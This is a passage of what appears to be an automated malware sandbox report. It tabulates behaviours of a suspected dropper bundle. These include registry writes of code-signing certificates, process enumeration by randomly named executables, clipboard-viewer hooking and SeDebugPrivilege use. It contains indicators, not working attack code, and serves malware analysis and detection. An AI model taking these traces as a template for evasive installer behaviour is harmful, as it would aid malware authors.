ccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (7).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (7).exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\3185609.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\5422328.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\3U69TfgyoayjTexid7zPlzoC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\6304551.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
